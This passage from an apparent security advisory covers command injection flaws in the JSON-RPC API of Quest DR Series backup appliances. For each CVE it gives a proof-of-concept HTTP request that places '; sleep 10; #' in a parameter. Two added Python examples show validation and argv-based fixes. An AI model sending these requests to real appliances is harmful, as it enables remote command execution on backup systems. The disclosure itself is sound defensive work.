The storage service module offers support for managing storage devices.
The ‘add’ method was found to be vulnerable.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 106
Connection: close

{
  "jsonrpc": "2.0",
  "method": "add",
  "params": {
    "classname": "DRStorage",
    "service_tag": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.17. *Command injection in the get_storage_group_statistics method*

[CVE-2018-11159]
The application provides usage statistics for each storage group, such
as capacity used, compression status, inode count, etc. In particular,
the ‘group’ parameter passed to the ‘get_storage_group_statistics’ method
is not sanitized, allowing system commands to be injected.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 130
Connection: close

{
  "jsonrpc": "2.0",
  "method": "get_storage_group_statistics",
  "params": {
    "classname": "DRStorageGroup",
    "group": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.18. *Command injection in the create storage group method*

[CVE-2018-11160]
The subroutine that allows adding a new storage group was found to be
vulnerable to command injection. An attacker can inject system commands
on various request parameters, such as ‘Compression_mode’ and ‘passphrase’.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 130
Connection: close

{
  "jsonrpc": "2.0",
  "method": "create",
  "params": {
    "classname": "DRStorageGroup",
    "group": {
      "Compression_mode": "; sleep 10; #"
    }
  },
  "id": 1
}
—–/

7.19. *Command injection in the delete storage group method*

[CVE-2018-11161]
The ‘delete’ subroutine in the ‘StorageGroupService’ module passes user-generated
input to the ‘storage_group’ system binary without sanitization,
which allows an attacker to inject system commands via the ‘name’ parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 107
Connection: close

{
  "jsonrpc": "2.0",
  "method": "delete",
  "params": {
    "classname": "DRStorageGroup",
    "name": "; sleep 10; #"
  },
  "id": 1
}
—–/
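The defensive counterpart to the pattern in 7.19, added here as an example and not part of the advisory or the product's code: the storage group name is validated against an assumed naming policy and passed to the binary as its own argv element instead of being spliced into a shell string. The `storage_group` path and the `--delete`/`--name` flags are hypothetical, since the advisory does not document the binary's interface.

```python
"""Hardened counterpart to the bug in 7.19: the 'name' parameter of the
DRStorageGroup delete method reached the 'storage_group' binary as part of a
shell command string. Two controls close that class of bug: validate the
parameter against the format the product actually accepts, and pass it to
the binary as a separate argv element so no shell ever re-parses it.
"""
import re
import shlex
import subprocess
from typing import Callable, List

# Assumed naming policy (hypothetical; the advisory does not document the
# real rules). Requiring a leading alphanumeric also stops a name such as
# "--help" from being read as an option by the binary itself.
GROUP_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")

# Hypothetical path and flags; the storage_group CLI is not described on the page.
STORAGE_GROUP_BIN = "/usr/local/bin/storage_group"


class InvalidParameter(ValueError):
    """Raised before any process is spawned when a request parameter is malformed."""


def validate_group_name(name: object) -> str:
    if not isinstance(name, str) or GROUP_NAME.fullmatch(name) is None:
        raise InvalidParameter("storage group name has invalid characters or length")
    return name


def vulnerable_command(name: str) -> str:
    """Shape of the original defect: untrusted text spliced into a shell string."""
    return f"{STORAGE_GROUP_BIN} --delete --name {name}"


def shell_operators(cmdline: str) -> List[str]:
    """Tokenize a command line the way a POSIX shell would and return the
    control operators found; any operator means the name changed the
    command structure instead of staying a single argument."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    return [tok for tok in lexer if tok in (";", "&", "|", "&&", "||")]


def hardened_argv(name: str) -> List[str]:
    """argv form: the validated name is exactly one argument."""
    return [STORAGE_GROUP_BIN, "--delete", "--name", validate_group_name(name)]


def run_delete(name: str, runner: Callable = subprocess.run):
    """Dispatcher entry point for the delete method. The runner is injectable
    so the function can be exercised without executing anything."""
    argv = hardened_argv(name)  # raises InvalidParameter before anything runs
    return runner(argv, shell=False, capture_output=True, timeout=30)


if __name__ == "__main__":
    payload = "; sleep 10; #"  # the PoC value from 7.19
    print("operators in shell-string form:", shell_operators(vulnerable_command(payload)))
    print("argv form for a valid name:", hardened_argv("nightly_backups"))
    try:
        hardened_argv(payload)
    except InvalidParameter as exc:
        print("rejected:", exc)
```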

7.20. *Command injection in the update storage group method*

[CVE-2018-11162]
Several request parameters are taken from the ‘newGroup’ dictionary when
updating a storage group and used as components of a command string without
any sanitization taking place.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 159
Connection: close

{
  "jsonrpc": "2.0",
  "method": "update",
  "params": {
    "classname": "DRStorageGroup",
    "newGroup": {
      "Name": "; sleep 10; #",
      "Compression_mode": "pepecomprimido"
    }
  },
  "id": 1
}
—–/

7.21. *Command injection in the set contact information method*

[CVE-2018-11163]
The GUI provides functionality to set the administrator contact information.
The ‘relay_host’ parameter is used as provided in the construction of a
command line string, therefore allowing attackers to inject system commands.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 143
Connection: close

{
  "jsonrpc": "2.0",
  "method": "set",
  "params": {
    "classname": "DRContactInformation",
    "action": "email_alerts",
    "relay_host": "'; sleep 10; #"
  },
  "id": 1
}
—–/

7.22. *Command injection in the generate diagnostics method*

[CVE-2018-11164]
The diagnostics page allows users to generate diagnostic logs that capture
the state of the system. An attacker authenticated within the web application
can inject arbitrary system commands by crafting the value of the ‘type’
request parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 108
Connection: close

{
  "jsonrpc": "2.0",
  "method": "generate",
  "params": {
    "classname": "DRDiagnostics",
    "type": "; sleep 15; #"
  },
  "id": 1
}
—–/

7.23. *Command injection in the delete diagnostics method*

[CVE-2018-11165]
The ‘delete’ diagnostics functionality was found to be vulnerable to command
injection via the ‘file_name’ parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 111
Connection: close

{
  "jsonrpc": "2.0",
  "method": "delete",
  "params": {
    "classname": "DRDiagnostics",
    "file_name": "; sleep 15; #"
  },
  "id": 1
}
—–/

7.24. *Command injection in the rescan_replica_VTL_container method*

[CVE-2018-11166]
The subroutine in charge of rescanning a VTL container replica was found to
be vulnerable to command injection via the container name parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 133
Connection: close

{
  "jsonrpc": "2.0",
  "method": "rescan_replica_VTL_container",
  "params": {
    "classname": "DRReplications",
    "cname": "; sleep 10; echo "
  },
  "id": 1
}
—–/

7.25. *Command injection in the activate_replica_VTL_container method*

[CVE-2018-11167]
The subroutine in charge of activating a VTL container was found to be
vulnerable to command injection via the container name parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 136
Connection: close

{
  "jsonrpc": "2.0",
  "method": "activate_replica_VTL_container",
  "params": {
    "classname": "DRReplications",
    "cname": "; sleep 10; echo "
  },
  "id": 1
}
—–/

7.26. *Command injection in the deactivate_replica_VTL_container method*

[CVE-2018-11168]
The subroutine in charge of deactivating a VTL container was also found to
be vulnerable to command injection via the container name parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: 5cfa2c5f6b6ba320c54c5dc4c2917bf5
Content-Length: 138
Connection: close

{
  "jsonrpc": "2.0",
  "method": "deactivate_replica_VTL_container",
  "params": {
    "classname": "DRReplications",
    "cname": "; sleep 10; echo "
  },
  "id": 1
}
—–/

7.27. *Command injection in the start replication method*

[CVE-2018-11169]
The ‘start’ replication subroutine implements the logic to perform a
replication in an existing storage replication relationship. Arbitrary
command execution can be achieved via the ‘name’ parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 107
Connection: close

{
  "jsonrpc": "2.0",
  "method": "start",
  "params": {
    "classname": "DRReplications",
    "name": "'; sleep 15; #"
  },
  "id": 1
}
—–/

7.28. *Command injection in the stop replication method*

[CVE-2018-11170]
The ‘stop’ replication functionality was also found to be vulnerable to
command injection.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 106
Connection: close

{
  "jsonrpc": "2.0",
  "method": "stop",
  "params": {
    "classname": "DRReplications",
    "name": "'; sleep 15; #"
  },
  "id": 1
}
—–/

7.29. *Command injection in the delete replication method*

[CVE-2018-11171]
Deleting a replication is yet another way in which authenticated attackers
could abuse the ‘ReplicationsService’ module in order to execute system
commands in the context of the web application.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 106
Connection: close

{
  "jsonrpc": "2.0",
  "method": "delete",
  "params": {
    "classname": "DRReplications",
    "name": "'; sleep 15; #"
  },
  "id": 1
}
—–/

7.30. *Command injection in the set hostname method*

[CVE-2018-11172]
The system hostname can be updated via the ‘HostnameService’ exposed
functionality. Request parameters are not sanitized.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 104
Connection: close

{
  "jsonrpc": "2.0",
  "method": "set",
  "params": {
    "classname": "DRHostname",
    "hostname": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.31. *Command injection in the add email alert method*

[CVE-2018-11173]
Attackers can inject system commands by requesting to add an email alert and
providing a malicious email address containing the payload.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 112
Connection: close

{
  "jsonrpc": "2.0",
  "method": "add",
  "params": {
    "classname": "DREmailAlerts",
    "emailAddress": "'; sleep 10; #"
  },
  "id": 1
}
—–/

7.32. *Command injection in the delete email alert method*

[CVE-2018-11174]
Analogous to the email alert ‘add’ subroutine, the ‘delete’ email alert
counterpart is also vulnerable to command injection because of an unsanitized
email address parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 115
Connection: close

{
  "jsonrpc": "2.0",
  "method": "delete",
  "params": {
    "classname": "DREmailAlerts",
    "emailAddress": "'; sleep 10; #"
  },
  "id": 1
}
—–/

7.33. *Command injection in the setBandwidthLimit method*

[CVE-2018-11175]
The DR series appliance can be configured to enforce different limits over
the network traffic. This functionality is handled by the
‘NetworkInterfacesServices’ module and its ‘setBandwidthLimit’ subroutine
was found to be vulnerable to command injection.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 154
Connection: close

{
  "jsonrpc": "2.0",
  "method": "setBandwidthLimit",
  "params": {
    "classname": "DRNetworkInterface",
    "bandwidthUnit": "default",
    "targetIp": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.34. *Command injection in the set_passphrase method*

[CVE-2018-11176]
A DR series system can be configured to use encryption at rest. The method
that sets the passphrase can be abused by attackers to execute arbitrary
system commands.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 119
Connection: close

{
  "jsonrpc": "2.0",
  "method": "set_passphrase",
  "params": {
    "classname": "DREncryption",
    "passphrase": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.35. *Command injection in the set_encryption_settings method*

[CVE-2018-11177]
Different encryption settings can be configured, such as the encryption mode
and the key rotation interval. These parameters are taken from the user
generated request and used as components of a command string, therefore
allowing attackers to inject arbitrary system commands.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 128
Connection: close

{
  "jsonrpc": "2.0",
  "method": "set_encryption_settings",
  "params": {
    "classname": "DREncryption",
    "encryption": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.36. *Command injection in the start_filesystem method*

[CVE-2018-11178]
Several features implemented in the ‘StartupPassphraseService’ module were
found to be vulnerable to command injection. In particular, the
‘start_filesystem’ subroutine takes a user supplied passphrase to construct
a system command.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 129
Connection: close

{
  "jsonrpc": "2.0",
  "method": "start_filesystem",
  "params": {
    "classname": "DRStartupPassphrase",
    "passphrase": "'; sleep 10; #"
  },
  "id": 1
}
—–/

7.37. *Command injection in the save_configuration method*

[CVE-2018-11179]
Saving startup configuration was also found to be prone to command injection
issues.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 151
Connection: close

{
  "jsonrpc": "2.0",
  "method": "save_configuration",
  "params": {
    "classname": "DRStartupPassphrase",
    "status": "pepito",
    "passphrase": "'; sleep 10; #"
  },
  "id": 1
}

7.38. *Command injection in the cloud portal register method*

[CVE-2018-11180]
The ‘CloudPortal’ module allows registering an agent with the cloud portal
system. Its ‘register’ subroutine was found to be vulnerable to command
injection via the ‘registrationCode’ request parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 120
Connection: close

{
  "jsonrpc": "2.0",
  "method": "register",
  "params": {
    "classname": "DRCloudPortal",
    "registrationCode": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.39. *Command injection in the customer portal register method*

[CVE-2018-11181]
The subroutine in charge of registering the DR series appliance with the
Quest Customer Portal could be abused by an authenticated attacker to
execute system commands via a specially crafted ‘token’ request parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 112
Connection: close

{
  "jsonrpc": "2.0",
  "method": "register",
  "params": {
    "classname": "DRCustomerPortal",
    "token": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.40. *Command injection in the customer portal changeManageBtn method*

[CVE-2018-11182]
Customer portal integration supports changing the manage button action.
This functionality was found to be vulnerable via the ‘action’ parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 120
Connection: close

{
  "jsonrpc": "2.0",
  "method": "changeManageBtn",
  "params": {
    "classname": "DRCustomerPortal",
    "action": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.41. *Command injection in the set DNS method*

[CVE-2018-11183]
The ‘set’ subroutine in the ‘DnsService’ module allows users to configure
the DNS servers used. When setting new DNS server configuration, several
user supplied parameters are used to build a command line string without
applying any sanitization, therefore leading to command injection.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 101
Connection: close

{
  "jsonrpc": "2.0",
  "method": "set",
  "params": {
    "classname": "DRDns",
    "dns_suffix": "; sleep 10; #"
  },
  "id": 1
}
—–/
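
The root cause given for this entry and the other command injection entries, a request parameter spliced into a command line string, is illustrated below as an added example; it is not code from the DR series appliance or from Quest. The tool path, the function names and the sample inputs are assumptions. A vulnerable builder that interpolates the dns_suffix value into a shell string is placed next to a hardened version that validates the value against a DNS name grammar and passes it as a single argv element with no shell involved.

```python
import re
import subprocess

# Placeholder for the appliance-side tool that applies the DNS suffix. The
# real DR series script is not known; this path is an assumption.
DNS_TOOL = "/usr/local/bin/set-dns-suffix"

# A DNS name: dot-separated labels of letters, digits and hyphens, 1-63
# characters each, no leading or trailing hyphen, at most 253 overall.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
DNS_SUFFIX_RE = re.compile(rf"(?:{_LABEL}\.)*{_LABEL}")


def build_dns_command_vulnerable(dns_suffix: str) -> str:
    """The pattern behind CVE-2018-11183: the request parameter is pasted
    into a command line that is later handed to a shell, so everything
    after a ';' in the value is parsed as a second command."""
    return f"{DNS_TOOL} {dns_suffix}"


def validate_dns_suffix(dns_suffix: str) -> str:
    """Positive validation: accept only a syntactically valid DNS name and
    reject everything else, instead of trying to strip 'bad' characters."""
    if len(dns_suffix) > 253 or not DNS_SUFFIX_RE.fullmatch(dns_suffix):
        raise ValueError(f"invalid DNS suffix: {dns_suffix!r}")
    return dns_suffix


def build_dns_command_hardened(dns_suffix: str) -> list:
    """The validated value becomes one argv element. With an argument vector
    and no shell there is no command line to parse, so shell metacharacters
    could not be interpreted even if validation were somehow bypassed."""
    return [DNS_TOOL, validate_dns_suffix(dns_suffix)]


def set_dns_suffix(dns_suffix: str, dry_run: bool = True) -> list:
    """Apply the suffix; dry_run only builds the argv (the tool does not
    exist on the machine running this example)."""
    argv = build_dns_command_hardened(dns_suffix)
    if not dry_run:
        subprocess.run(argv, check=True)  # shell=False: argv goes straight to execve
    return argv


if __name__ == "__main__":
    payload = "; sleep 10; #"  # the shape of the proof of concept above
    print("vulnerable command line:", build_dns_command_vulnerable(payload))
    try:
        build_dns_command_hardened(payload)
    except ValueError as exc:
        print("hardened rejects:", exc)
    print("hardened argv:", set_dns_suffix("corp.example.com"))
```

The same two changes, a per-parameter grammar and an argument vector instead of a shell string, apply to every parameter named in sections 7.24 to 7.46; values with a looser grammar (passphrases, email addresses) still never need a shell, they only need to be passed as argv elements or, where a script must be invoked, fed on stdin.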

7.42. *Command injection in the get usage method*

[CVE-2018-11184]
The ‘UsageService’ module allows administrators to monitor system usage.
A single subroutine processes the user’s query and returns the corresponding
statistics.

The following proof of concept exploits the ‘usage’ type.

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 114
Connection: close

{
  "jsonrpc": "2.0",
  "method": "get",
  "params": {
    "classname": "DRUsage",
    "type": "usage",
    "width": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.43. *Command injection in the support portal register method*

[CVE-2018-11185]
DR series systems can be registered with the Quest Support Portal. Registered
systems collect certain information such as operational statistics, performance
metrics, diagnostic information and configuration settings, which is then
transmitted to Quest in order to help troubleshoot system problems.

The subroutine implementing the registration functionality with the Support
Portal was found to be vulnerable to command injection via the ’email’
parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 111
Connection: close

{
  "jsonrpc": "2.0",
  "method": "register",
  "params": {
    "classname": "DRSupportPortal",
    "email": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.44. *Command injection in the setDateAndTime method*

[CVE-2018-11186]
Attackers can execute arbitrary system commands by configuring a custom
timezone.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 115
Connection: close

{
  "jsonrpc": "2.0",
  "method": "setDateAndTime",
  "params": {
    "classname": "DRDateTime",
    "timezone": "; sleep 10; #"
  },
  "id": 1
}
—–/

7.45. *Command injection in the global view add_member method*

[CVE-2018-11187]
GlobalView is a dashboard view providing a global picture of all the DR
Series systems in an organization. The functionality to add a new system
was found to be vulnerable to command injection via the ‘RemoteHost’
parameter.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 165
Connection: close

{
  "jsonrpc": "2.0",
  "method": "add_member",
  "params": {
    "classname": "DRGlobalView",
    "UserName": "pepito",
    "Password": "pepito123",
    "RemoteHost": "; sleep 10; echo "
  },
  "id": 1
}
—–/

7.46. *Command injection in the global view reconnect_member method*

[CVE-2018-11188]
Reconnecting a disconnected system in the Global View page can also result
in arbitrary command execution.

Proof of concept:

/—–
POST /ws/v1.0/jsonrpc HTTP/1.1
Host: 192.168.1.39
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.39/
Content-Type: application/json-rpc
SessionCookie: e2de614014605fc5115fd72076aa827e
Content-Length: 171
Connection: close

{
